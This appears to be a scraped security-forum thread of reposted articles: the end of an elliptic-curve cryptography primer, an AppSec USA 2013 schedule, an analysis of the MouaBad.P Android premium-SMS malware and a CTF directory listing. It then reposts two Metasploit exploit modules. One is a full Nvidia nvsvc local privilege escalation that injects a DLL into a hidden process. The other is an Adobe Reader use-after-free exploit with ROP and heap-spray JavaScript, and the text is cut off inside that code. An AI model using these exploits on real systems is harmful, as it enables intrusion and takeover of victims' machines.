symmetry. Any point on the curve can be reflected over the x axis and remain the same curve. A more interesting property is that any non-vertical line will intersect the curve in at most three places. Let's imagine this curve as the setting for a bizarre game of billiards. Take any two points on the curve and draw a line through them, it will intersect the curve at exactly one more place. In this game of billiards, you take a ball at point A, shoot it towards point B. When it hits the curve, the ball bounces either straight up (if it's below the x-axis) or straight down (if it's above the x-axis) to the other side of the curve. We can call this billiards move on two points "dot." Any two points on a curve can be dotted together to get a new point. A dot B = C We can also string moves together to "dot" a point with itself over and over. A dot A = B A dot B = C A dot C = D ... It turns out that if you have two points, an initial point "dotted" with itself n times to arrive at a final point, finding out n when you only know the final point and the first point is hard. To continue our bizzaro billiards metaphor, imagine one person plays our game alone in a room for a random period of time. It is easy for him to hit the ball over and over following the rules described above. If someone walks into the room later and sees where the ball has ended up, even if they know all the rules of the game and where the ball started, they cannot determine the number of times the ball was struck to get there without running through the whole game again until the ball gets to the same point. Easy to do, hard to undo: this is the basis for a very good Trapdoor Function. Let's get weird This simplified curve above is great to look at and explain the general concept of elliptic curves, but it doesn't represent what the curves used for cryptography look like. For this, we have to restrict ourselves to numbers in a fixed range, like in RSA. Rather than allow any value for the points on the curve, we restrict ourselves to whole numbers in a fixed range. When computing the formula for the elliptic curve (y2 = x3 + ax + , we use the same trick of rolling over numbers when we hit the maximum. If we pick the maximum to be a prime number, the elliptic curve is called a prime curve and has excellent cryptographic properties. Here's an example of a curve (y2 = x3 - x + 1) plotted for all numbers: Here's the plot of the same curve with only the whole number points represented with a maximum of 97: This hardly looks like a curve in the traditional sense, but it is. It's like the original curve was wrapped around at the edges and only the parts of the curve that hit whole number coordinates are colored in. You can even still see the horizontal symmetry. In fact, you can still play the billiards game on this curve and dot points together. The equation for a line on the curve still has the same properties. Moreover, the dot operation can be efficiently computed. You can visualize the line between two points as a line that wraps around at the borders until it hits a point. It's as if in our bizarro billiards game, when a ball hits the edge of the board (the max) then it is magically transported to the opposite side of the table and continues on its path until reaching a point, kind of like the game Asteroids. With this new curve representation, you can take messages and represent them as points on the curve. You could imagine taking a message and setting it as the x coordinate, and solving for y to get a point on the curve. It is slightly more complicated than this in practice, but this is the general idea. You get the points (70,6), (76,48), -, (82,6), (69,22) *There are no coordinates with 65 for the x value, this can be avoided in the real world An elliptic curve cryptosystem can be defined by picking a prime number as a maximum, a curve equation and a public point on the curve. A private key is a number priv, and a public key is the public point dotted with itself priv times. Computing the private key from the public key in this kind of cryptosystem is called the elliptic curve discrete logarithm function. This turns out to be the Trapdoor Function we were looking for. What does it all mean? The elliptic curve discrete logarithm is the hard problem underpinning elliptic curve cryptography. Despite almost three decades of research, mathematicians still haven't found an algorithm to solve this problem that improves upon the naive approach. In other words, unlike with factoring, based on currently understood mathematics there doesn't appear to be a shortcut that is narrowing the gap in a Trapdoor Function based around this problem. This means that for numbers of the same size, solving elliptic curve discrete logarithms is significantly harder than factoring. Since a more computationally intensive hard problem means a stronger cryptographic system, it follows that elliptic curve cryptosystems are harder to break than RSA and Diffie-Hellman. To visualize how much harder it is to break, Lenstra recently introduced the concept of "Global Security." You can compute how much energy is needed to break a cryptographic algorithm, and compare that with how much water that energy could boil. This is a kind of cryptographic carbon footprint. By this measure, breaking a 228-bit RSA key requires less energy to than it takes to boil a teaspoon of water. Comparatively, breaking a 228-bit elliptic curve key requires enough energy to boil all the water on earth. For this level of security with RSA, you'd need a key with 2,380-bits. With ECC, you can use smaller keys to get the same levels of security. Small keys are important, especially in a world where more and more cryptography is done on less powerful devices like mobile phones. While multiplying two prime numbers together is easier than factoring the product into its component parts, when the prime numbers start to get very long even just the multiplication step can take some time on a low powered device. While you could likely continue to keep RSA secure by increasing the key length that comes with a cost of slower cryptographic performance on the client. ECC appears to offer a better tradeoff: high security with short, fast keys. Elliptic curves in action After a slow start, elliptic curve based algorithms are gaining popularity and the pace of adoption is accelerating. Elliptic curve cryptography is now used in a wide variety of applications: the U.S. government uses it to protect internal communications, the Tor project uses it to help assure anonymity, it is the mechanism used to prove ownership of bitcoins, it provides signatures in Apple's iMessage service, it is used to encrypt DNS information with DNSCurve, and it is the preferred method for authentication for secure web browsing over SSL/TLS. CloudFlare uses elliptic curve cryptography to provide perfect forward secrecy which is essential for online privacy. First generation cryptographic algorithms like RSA and Diffie-Hellman are still the norm in most arenas, but elliptic curve cryptography is quickly becoming the go-to solution for privacy and security online. If you are accessing the HTTPS version of this blog (https://blog.cloudflare.com) from a recent enough version of Chrome or Firefox, your browser is using elliptic curve cryptography. You can check this yourself. In Chrome, you can click on the lock in the address bar and go to the connection tab to see which cryptographic algorithms were used in establishing the secure connection. Clicking on the lock in the Chrome 30 should show the following image. The relevant portions of this text to this discussion is ECDHE_RSA. ECDHE stands for Elliptic Curve Diffie Hellman Ephemeral and is a key exchange mechanism based on elliptic curves. This algorithm is used by CloudFlare to provide perfect forward secrecy in SSL. The RSA component means that RSA is used to prove the identity of the server. We use RSA because CloudFlare's SSL certificate is bound to an RSA key pair. Modern browsers also support certificates based on elliptic curves. If CloudFlare's SSL certificate was an elliptic curve certificate this part of the page would state ECDHE_ECDSA. The proof of the identity of the server would be done using ECDSA, the Elliptic Curve Digital Signature Algorithm. CloudFlare's ECC curve for ECDHE (This is the same curve used by Google.com): max: 115792089210356248762697446949407573530086143415290314195533631308867097853951 curve: y² = x³ + ax + b a = 115792089210356248762697446949407573530086143415290314195533631308867097853948 b = 41058363725152142129326129780047268409114441015993725554835256314039467401291 The performance improvement of ECDSA over RSA is dramatic. Even with an older version of OpenSSL that does not have assembly-optimized elliptic curve code, an ECDSA signature with a 256-bit key is over 20x faster than an RSA signature with a 2,048-bit key. On a MacBook Pro with OpenSSL 0.9.8, the "speed" benchmark returns: Doing 256 bit sign ecdsa's for 10s: 42874 256 bit ECDSA signs in 9.99s Doing 2048 bit private rsa's for 10s: 1864 2048 bit private RSA's in 9.99s That's 23x as many signatures using ECDSA as RSA. CloudFlare is constantly looking to improve SSL performance. Just this week, CloudFlare started using an assembly-optimized version of ECC that more than doubles the speed of ECDHE. Using elliptic curve cryptography saves time, power and computational resources for both the server and the browser helping us make the web both faster and more secure. The downside It is not all roses in the world of elliptic curves, there have been some questions and uncertainties that have held them back from being fully embraced by everyone in the industry. One point that has been in the news recently is the Dual Elliptic Curve Deterministic Random Bit Generator (Dual_EC_DRBG). This is a random number generator standardized by the National Institute of Standards and Technology (NIST), and promoted by the NSA. Dual_EC_DRBG generates random-looking numbers using the mathematics of elliptic curves. The algorithm itself involves taking points on a curve and repeatedly performing an elliptic curve "dot" operation. After publication it was reported that it could have been designed with a backdoor, meaning that the sequence of numbers returned could be fully predicted by someone with the right secret number. Recently, the company RSA recalled several of their products because this random number generator was set as the default PRNG for their line of security products. Whether or not this random number generator was written with a backdoor or not does not change the strength of the elliptic curve technology itself, but it does raise questions about the standardization process for elliptic curves. As we've written about before, it's also part of the reason that attention should be spent to ensuring that your system is using adequately random numbers. In a future blog post, we will go into how a backdoor could be snuck into the specification of this algorithm. Some of the more skeptical cryptographers in the world now have a general distrust for NIST itself and the standards it has published that were supported by the NSA. Almost all of the widely implemented elliptic curves fall into this category. There are no known attacks on these special curves, chosen for their efficient arithmetic, however bad curves do exist and some feel it is better to be safe than sorry. There has been progress in developing curves with efficient arithmetic outside of NIST, including curve 25519 created by Daniel Bernstein (djb) and more recently computed curves by Paulo Baretto and collaborators, though widespread adoption of these curves are several years away. Until these non-traditional curves are implemented by browsers, they won't be able to be used for securing cryptographic transport on the web. Another uncertainty about elliptic curve cryptography is related to patents. There are over 130 patents that cover specific uses of elliptic curves owned by BlackBerry (through their 2009 acquisition of Certicom). Many of these patents were licensed for use by private organizations and even the NSA. This has given some developers pause over whether their implementations of ECC infringe upon this patent portfolio. In 2007, Certicom filed suit against Sony for some uses of elliptic curves, however that lawsuit was dismissed in 2009. There are now many implementations of elliptic curve cryptography that are thought to not infringe upon these patents and are in wide use. The ECDSA digital signature has a drawback compared to RSA in that it requires a good source of entropy. Without proper randomness, the private key could be revealed. A flaw in the random number generator on Android allowed hackers to find the ECDSA private key used to protect the bitcoin wallets of several people in early 2013. Sony's Playstation implementation of ECDSA had a similar vulnerability. A good source of random numbers is needed on the machine making the signatures. Dual_EC_DRBG is not recommended. Looking ahead Even with the above cautions, the advantages of elliptic curve cryptography over traditional RSA are widely accepted. Many experts are concerned that the mathematical algorithms behind RSA and Diffie-Hellman could be broken within 5 years, leaving ECC as the only reasonable alternative. Elliptic curves are supported by all modern browsers, and most certification authorities offer elliptic curve certificates. Every SSL connection for a CloudFlare protected site will default to ECC on a modern browser. Soon, CloudFlare will allow customers to upload their own elliptic curve certificates. This will allow ECC to be used for identity verification as well as securing the underlying message, speeding up HTTPS sessions across the board. More on this when the feature becomes available. Sursa: A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography | CloudFlare Blog
  19. AppSec USA 2013 - Presentations [h=2]NOVEMBER 20 • WEDNESDAY[/h] 8:30AM – 8:50AM Welcome to OWASP AppSecUSA – Updates Speakers: Tom Brennan, Peter Dean, Israel Bryski 9:00AM – 9:50AM Keynote: Computer and Network Security: I Think We Can Win! Speakers: William Cheswick 10:00AM – 10:50AM Hardening Windows 8 apps for the Windows Store Speakers: Bill Sempf 10:00AM – 10:50AM The Perilous Future of Browser Security Speakers: Robert Hansen 10:00AM – 10:50AM Automation Domination Speakers: Brandon Spruth 10:00AM – 10:50AM How To Stand Up an AppSec Program – Lessons from the Trenches Speakers: Joe Friedman 10:00AM – 10:50AM PANEL: Aim-Ready-Fire Moderator: Wendy Nather Speakers: Ajoy Kumar, Pravir Chandra, Suprotik Ghose, Jason Rothhaupt, Ramin Safai, Sean Barnum 10:00AM – 10:50AM Project Talk: Project Leader Workshop Speakers: Samantha Groves 11:00AM – 11:50AM From the Trenches: Real-World Agile SDLC Speakers: Chris Eng 11:00AM – 11:50AM Securing Cyber-Physical Application Software Speakers: Warren Axelrod 11:00AM – 11:50AM Why is SCADA Security an Uphill Battle? Speakers: Amol Sarwate 11:00AM – 11:50AM Computer Crime Laws Speakers: Tor Ekeland, Attorney 11:00AM – 11:50AM Can AppSec Training Really Make a Smarter Developer? Speakers: John Dickson 11:00AM – 11:50AM Project Talk: OWASP Enterprise Security API Project Speakers: Chris Schmidt, Kevin Wall 12:00PM – 12:50PM All the network is a stage, and the APKs merely players: Scripting Android Applications Speakers: Daniel Peck 12:00PM – 12:50PM BASHing iOS Applications: dirty, s*xy, cmdline tools for mobile auditors Speakers: Jason Haddix, Dawn Isabel 12:00PM – 12:50PM Case Study: 10 Steps to Agile Development without Compromising Enterprise Security Speakers: Yair Rovek 12:00PM – 12:50PM Build but don’t break: Lessons in Implementing HTTP Security Headers Speakers: Kenneth Lee 12:00PM – 12:50PM The Cavalry Is Us: Protecting the public good Speakers: Josh Corman, Nicholas J. Percoco 1:00PM – 1:50PM Mantra OS: Because The World is Cruel Speakers: Greg Disney-Leugers 1:00PM – 1:50PM Open Mic – Birds of a Feather –> Cavalry Speakers: Josh Corman, Nicholas J. Percoco 1:00PM – 1:50PM HTML5: Risky Business or Hidden Security Tool Chest? Speakers: Johannes Ullrich 1:00PM – 1:50PM A Framework for Android Security through Automation in Virtual Environments Speakers: Parth Patel 1:00PM – 1:50PM 2013 AppSec Guide and CISO Survey: Making OWASP Visible to CISOs Speakers: Marco Morana, Tobias Gondrom 1:00PM – 1:50PM PANEL: Privacy or Security: Can We Have Both? Moderators: Jeff Fox Speakers: Jim Manico, James Elste, Jack Radigan, Amy Neustein, Joseph Concannon, Steven Rambam 1:00PM – 1:50PM Project Talk: OWASP OpenSAMM Project Speakers: Seba Deleersnyder, Pravir Chandra 2:00PM – 2:50PM Javascript libraries (in)security: A showcase of reckless uses and unwitting misuses Speakers: Stefano Di Paola 2:00PM – 2:50PM Revenge of the Geeks: Hacking Fantasy Sports Sites Speakers: Dan Kuykendall 2:00PM – 2:50PM What You Didn’t Know About XML External Entities Attacks Speakers: Timothy Morgan 2:00PM – 2:50PM Open Mic: Making the CWE Approachable for AppSec Newcomers Speakers: Hassan Radwan 2:00PM – 2:50PM “What Could Possibly Go Wrong?” – Thinking Differently About Security Speakers: Mary Ann Davidson 2:00PM – 2:50PM PANEL: Cybersecurity and Media: All the News That’s Fit to Protect? Moderators: Dylan Tweney Speakers: Rajiv Pant, Gordon Platt, Space Rogue, Michael Carbone, Nico Sell 2:00PM – 2:50PM Project Talk: The OWASP Education Projects Speakers: Konstantinos Papapanagiotou, Martin Knobloch 3:00PM – 3:50PM Advanced Mobile Application Code Review Techniques Speakers: sreenarayan a 3:00PM – 3:50PM OWASP Zed Attack Proxy Speakers: Simon Bennetts 3:00PM – 3:50PM Open Mic: FERPAcolypse NOW! – Lessons Learned from an inBloom Assessment Speakers: Mark Major 3:00PM – 3:50PM Pushing CSP to PROD: Case Study of a Real-World Content-Security Policy Implementation Speakers: Brian Holyfield, Erik Larsson 3:00PM – 3:50PM MMaking the Future Secure with Java Speakers: Milton Smith 3:00PM – 3:50PM PANEL: Mobile Security 2.0: Beyond BYOD Moderators: Stephen Wellman Speakers: Devindra Hardawar, Daniel Miessler, Jason Rouse 3:00PM – 3:50PM Project Talk: OWASP AppSensor Project Speakers: John Melton, Dennis Groves 4:00PM – 4:50PM OWASP Top Ten Proactive Controls Speakers: Jim Manico 4:00PM – 4:50PM Open Mic: Struts Ognl – Vulnerabilities Discovery and Remediation Speakers: Eric Kobrin 4:00PM – 4:50PM Big Data Intelligence (Harnessing Petabytes of WAF statistics to Analyze & Improve Web Protection in the Cloud) Speakers: Ory Segal, Tsvika Klein 4:00PM – 4:50PM Forensic Investigations of Web Explotations Speakers: Ondrej Krehel 4:00PM – 4:50PM Sandboxing JavaScript via Libraries and Wrappers Speakers: Phu Phung 4:00PM – 4:50PM Tagging Your Code with a Useful Assurance Label Speakers: Robert Martin, Sean Barnum [h=2]NOVEMBER 21 • THURSDAY[/h] 9:00AM – 9:50AM ‘) UNION SELECT `This_Talk` AS (‘New Exploitation and Obfuscation Techniques’)%00 Speakers: Roberto Salgado 9:00AM – 9:50AM Defeating XSS and XSRF using JSF Based Frameworks Speakers: Steve Wolf 9:00AM – 9:50AM Contain Yourself: Building Secure Containers for Mobile Devices Speakers: Ronald Gutierrez 9:00AM – 9:50AM Mobile app analysis with Santoku Linux Speakers: Hoog Andrew 9:00AM – 9:50AM AppSec at DevOps Speed and Portfolio Scale Speakers: Jeff Williams 9:00AM – 10:00AM OWN THE CON: How we organized AppSecUSA – come learn how you can do it too Speakers: Tom Brennan, Sarah Baso, Peter Dean, Israel Bryski 10:00AM – 10:50AM Open Mic: OpenStack Swift – Cloud Security Speakers: Rodney Beede 10:00AM – 10:50AM iOS Application Defense – iMAS Speakers: Gregg Ganley 10:00AM – 10:50AM PiOSoned POS – A Case Study in iOS based Mobile Point-of-Sale gone wrong Speakers: Mike Park 10:00AM – 10:50AM Accidental Abyss: Data Leakage on The Internet Speakers: Kelly FitzGerald 10:00AM – 10:50AM Leveraging OWASP in Open Source Projects – CAS AppSec Working Group Speakers: Bill Thompson, Aaron Weaver, David Ohsie 10:00AM – 11:50AM Project Talk and Training: OWASP O2 Platform Speakers: Dinis Cruz 11:00AM – 11:50AM OWASP Hackademic: a practical environment for teaching application security Speakers: Konstantinos Papapanagiotou 11:00AM – 11:50AM An Introduction to the Newest Addition to the OWASP Top 10. Experts Break-Down the New Guideline and Offer Provide Guidance on Good Component Practice Speakers: Ryan Berg 11:00AM – 11:50AM Verify your software for security bugs Speakers: Simon Roses Femerling 11:00AM – 11:50AM Open Mic: Password Breaches – Why They Impact Your App Security When Other WebApps Are Breached Speakers: Michael Coates 11:00AM – 11:50AM The State Of Website Security And The Truth About Accountability and “Best-Practices”, Full Report Speakers: Jeremiah Grossman 12:00PM – 12:50PM Open Mic: What Makes OWASP Japan Special Speakers: Riotaro OKADA 12:00PM – 12:50PM Insecure Expectations Speakers: Matt Konda 12:00PM – 12:50PM OWASP Periodic Table of Vulnerabilities Speakers: James Landis 12:00PM – 12:50PM Application Security: Everything we know is wrong Speakers: Eoin Keary 12:00PM – 12:50PM PANEL: Women in Information Security: Who Are We? Where Are We Going? Moderators: Joan Goodchild Speakers: Dawn-Marie Hutchinson, Valene Skerpac, Carrie Schaper, Gary Phillips 12:00PM – 12:50PM Project Talk: OWASP Testing Guide Speakers: Andrew Mueller, Matteo Meucci 1:00PM – 1:50PM Hack.me: a new way to learn web application security Speakers: Armando Romeo 1:00PM – 1:50PM Hacking Web Server Apps for iOS Speakers: Bruno Oliviera 1:00PM – 1:50PM Open Mic: Vision of the Software Assurance Market (SWAMP) 1:00PM – 1:50PM NIST – Missions and impacts to US industry, economy and citizens Speakers: James St. Pierre, Rick Kuhn 1:00PM – 1:50PM PANEL: Wait Wait… Don’t Pwn Me! Moderators: Mark Miller Speakers: Josh Corman, Chris Eng, Space Rogue, Gal Shpantzer 1:00PM – 1:50PM Project Talk: OWASP Development Guide Speakers: Andrew van der Stock 2:00PM – 2:50PM Buried by time, dust and BeEF Speakers: Michele Orru 2:00PM – 2:50PM Go Fast AND Be Secure: Eliminating Application Risk in the Era of Modern, Component-Based Development Speakers: Jeff Williams, Ryan Berg 2:00PM – 2:50PM Modern Attacks on SSL/TLS: Let the BEAST of CRIME and TIME be not so LUCKY Speakers: Pratik Guha Sarkar, Shawn Fitzgerald 2:00PM – 2:50PM OWASP Broken Web Applications (OWASP BWA): Beyond 1.0 Speakers: Chuck Willis 2:00PM – 2:50PM POpen Mic: Practical Cyber Threat Intelligence with STIX Speakers: Sean Barnum 2:00PM – 2:50PM Project Talk: OWASP Security Principles Project Speakers: Dennis Groves 3:00PM – 3:30PM Open Mic: About OWASP Speakers: Sarah Baso, Michael Coates 3:00PM – 3:50PM HTTP Time Bandit Speakers: Vaagn Toukharian 3:00PM – 3:50PM Wassup MOM? Owning the Message Oriented Middleware Speakers: Gursev Singh Kalra 3:00PM – 3:50PM The 2013 OWASP Top 10 Speakers: Dave Wichers 3:00PM – 3:50PM CSRF not all defenses are created equal Speakers: Ari Elias-Bachrach 3:00PM – 3:50PM Project Talk: OWASP Code Review Guide Speakers: Larry Conklin 3:30PM – 4:00PM Bug Bounty – Group Hack Speakers: Tom Brennan, Casey Ellis 4:00PM – 5:00PM Award Ceremony Speakers: Tom Brennan, Peter Dean Sursa: Presentations | AppSec USA 2013
  20. Dissection of Android malware MouaBad.P In Zscaler’s daily scanning for mobile malware, we came across a sample of Android Mouabad.p. Lets see what is inside. Application static info: Package name = com.android.service Version name = 1.00.11 SDK version: 7 Size: 40 kb Permissions: android.permission.INTERNET android.permission.ACCESS_NETWORK_STATE android.permission.READ_PHONE_STATE android.permission.SET_WALLPAPER android.permission.WRITE_EXTERNAL_STORAGE android.permission.MOUNT_UNMOUNT_FILESYSTEMS android.permission.RECEIVE_SMS android.permission.SEND_SMS android.permission.RECEIVE_WAP_PUSH android.permission.READ_PHONE_STATE android.permission.WRITE_APN_SETTINGS android.permission.RECEIVE_BOOT_COMPLETED android.permission.WAKE_LOCK android.permission.DEVICE_POWER android.permission.SEND_SMS android.permission.WRITE_APN_SETTINGS android.permission.CHANGE_NETWORK_STATE android.permission.READ_SMS android.permission.READ_CONTACTS android.permission.WRITE_CONTACTS android.permission.CALL_PHONE android.permission.INTERNE android.permission.MODIFY_PHONE_STATE Used features: android.hardware.telephony android.hardware.touchscreen Services: com.android.service.MessagingService com.android.service.ListenService Receivers: com.android.receiver.PlugScreenRecevier com.android.receiver.PlugLockRecevier com.android.receiver.BootReceiver com.android.receiver.ScreenReceiver Virustotal scan: https://www.virustotal.com/en/file/1b47265eab3752a7d64a64f570e166a2114e41f559fa468547e6fa917cf64256/analysis/ Now Lets dissect the code. This application is using telephony services as shown in the code as well as in static analysis. You can see the use of premium telephone numbers. In this particular screenshot, you can see functions which are using phone services for making calls to the premium numbers in order to generate revenue as the numbers would be controlled by the attackers and earn a small payment for each call made. Here you can see that the application is harvesting SIM card information. This application also checks for mobile data and the WIFI network status to determine if Internet connectivity is available. The code includes a hardcoded list of premium telephone numbers, which are all located in China. In this screenshot you can clearly see that application also keeps watch on the screen and keyguard status (on/off). This screenshot clearly denotes that the application tries to send SMS to the premium rate numbers previously seen in the code. Forcing Android applications to initiate calls to premium phone numbers controlled by the attackers is a common revenue generation scheme that we see, particularly in Android application distributed in third party Android app stores. Here you can see various function names which are suspicious such as call, dial, disableDataConnectivity, get call location, etc. These functions suggest that the application is also trying to keep watch on other phone calls too. Function getCallstate, endCall, Call, CancleMissedCallNotification Illustrates that the application tries to control phone call services. The application installs itself silently. Once installed, no icon is observed for this app. Also shown in the previous screenshot is the fact that the application waits for the screen and keyguard events before triggering its malicious activity. It does all of the activity without user intervention. This allows the malware to function without a suspicious icon on the home screen that just one of technique used by malware authors to evade its presence to the device owner. From above screenshots, you can see that the application is using the XML listener service. Also, in the second screenshot, you can see that the application is trying to create a URL by assembling various strings. This is likely command and control (C&C) communication sent to a master server. The parameter &imei denotes the harvesting of the phone's IMEI number for tracking the device. In conclusion, this malware will defraud the victim by silently forcing the phone to initiate premium rate SMS billing to generate revenue. The application may give control to the author for monitoring or controlling phone calls. Reference: https://blog.lookout.com/blog/2013/12/09/mouabad-p-pocket-dialing-for-profit/ Posted by viral Sursa: Zscaler Research: Dissection of Android malware MouaBad.P
  21. Grehack CTF 2013 [TABLE] [TR] [TD][/TD] [TD]MISC/[/TD] [TD=align: right]16-Nov-2013 03:09 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]cryptography/[/TD] [TD=align: right]14-Nov-2013 16:21 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]forensics/[/TD] [TD=align: right]14-Nov-2013 16:21 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]in_memory_exploitation/[/TD] [TD=align: right]16-Nov-2013 03:36 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]network/[/TD] [TD=align: right]16-Nov-2013 03:09 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]reverse_engineering/[/TD] [TD=align: right]15-Nov-2013 16:52 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]steganography/[/TD] [TD=align: right]12-Nov-2013 10:58 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]web/[/TD] [TD=align: right]16-Nov-2013 03:09 [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TH=colspan: 5] [/TH][/TR] [/TABLE] Index of /CTF_2013
  22. [h=1]Nvidia (nvsvc) Display Driver Service Local Privilege Escalation[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/windows/priv' require 'msf/core/post/windows/process' require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/post/windows/services' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection include Msf::Post::Windows::Services def initialize(info={}) super(update_info(info, { 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', 'Description' => %q{ The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to interact with the service. It contains a stacked based buffer overflow as a result of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe', the service name is 'nvsvc', and the named pipe is 'nsvr'. This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012. }, 'License' => MSF_LICENSE, 'Author' => [ 'Peter Wintersmith', # Original exploit 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration ], 'Arch' => ARCH_X86_64, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows x64', { } ] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true, 'BadChars' => "\x00" }, 'References' => [ [ 'CVE', '2013-0109' ], [ 'OSVDB', '88745' ], [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ], ], 'DisclosureDate' => 'Dec 25 2012', 'DefaultTarget' => 0 })) end def check vuln_hashes = [ '43f91595049de14c4b61d1e76436164f', '3947ad5d03e6abcce037801162fdb90d', '3341d2c91989bc87c3c0baa97c27253b' ] os = sysinfo["OS"] if os =~ /windows/i svc = service_info 'nvsvc' if svc and svc['Name'] =~ /NVIDIA/i vprint_good("Found service '#{svc['Name']}'") begin if is_running? print_good("Service is running") else print_error("Service is not running!") end rescue RuntimeError => e print_error("Unable to retrieve service status") end if sysinfo['Architecture'] =~ /WOW64/i path = svc['Command'].gsub('"','').strip path.gsub!("system32","sysnative") else path = svc['Command'].gsub('"','').strip end begin hash = client.fs.file.md5(path).unpack('H*').first rescue Rex::Post::Meterpreter::RequestError => e print_error("Error checking file hash: #{e}") return Exploit::CheckCode::Detected end if vuln_hashes.include?(hash) vprint_good("Hash '#{hash}' is listed as vulnerable") return Exploit::CheckCode::Vulnerable else vprint_status("Hash '#{hash}' is not recorded as vulnerable") return Exploit::CheckCode::Detected end else return Exploit::CheckCode::Safe end end end def is_running? begin status = service_status('nvsvc') return (status and status[:state] == 4) rescue RuntimeError => e print_error("Unable to retrieve service status") return false end end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end unless check == Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") end print_status("Launching notepad to host the exploit...") windir = expand_path("%windir%") cmd = "#{windir}\\SysWOW64\\notepad.exe" process = client.sys.process.execute(cmd, nil, {'Hidden' => true}) host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") print_status("Reflectively injecting the exploit DLL into #{process.pid}...") library_path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-0109", "nvidia_nvsvc.x86.dll") library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid} ...") exploit_mem, offset = inject_dll_into_process(host_process, library_path) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(host_process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status("Payload injected. Executing exploit...") host_process.thread.create(exploit_mem + offset, payload_mem) print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.") end end Sursa: http://www.exploit-db.com/exploits/30393/
  23. [h=1]Adobe Reader ToolButton Use After Free[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => "Adobe Reader ToolButton Use After Free", 'Description' => %q{ This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used. }, 'License' => MSF_LICENSE, 'Author' => [ 'Soroush Dalili', # Vulnerability discovery 'Unknown', # Exploit in the wild 'sinn3r', # Metasploit module 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-3346' ], [ 'OSVDB', '96745' ], [ 'ZDI', '13-212' ], [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ], [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'DisableNops' => true }, 'BrowserRequirements' => { :source => /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, :os_flavor => Msf::OperatingSystems::WindowsVersions::XP, :ua_name => Msf::HttpClients::IE }, 'Targets' => [ [ 'Windows XP / IE / Adobe Reader 10/11', { } ], ], 'Privileged' => false, 'DisclosureDate' => "Aug 08 2013", 'DefaultTarget' => 0)) end def on_request_exploit(cli, request, target_info) print_status("request: #{request.uri}") js_data = make_js(cli, target_info) # Create the pdf pdf = make_pdf(js_data) print_status("Sending PDF...") send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' }) end def make_js(cli, target_info) # CreateFileMappingA + MapViewOfFile + memcpy rop chain rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info)) js = %Q| function heapSpray(str, str_addr, r_addr) { var aaa = unescape("%u0c0c"); aaa += aaa; while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa; var i1 = r_addr - 0x24; var bbb = aaa.substring(0, i1 / 2); var sa = str_addr; while (sa.length < (0x0c0c - r_addr)) sa += sa; bbb += sa; bbb += aaa; var i11 = 0x0c0c - 0x24; bbb = bbb.substring(0, i11 / 2); bbb += str; bbb += aaa; var i2 = 0x4000 + 0xc000; var ccc = bbb.substring(0, i2 / 2); while (ccc.length < (0x40000 + 0x40000)) ccc += 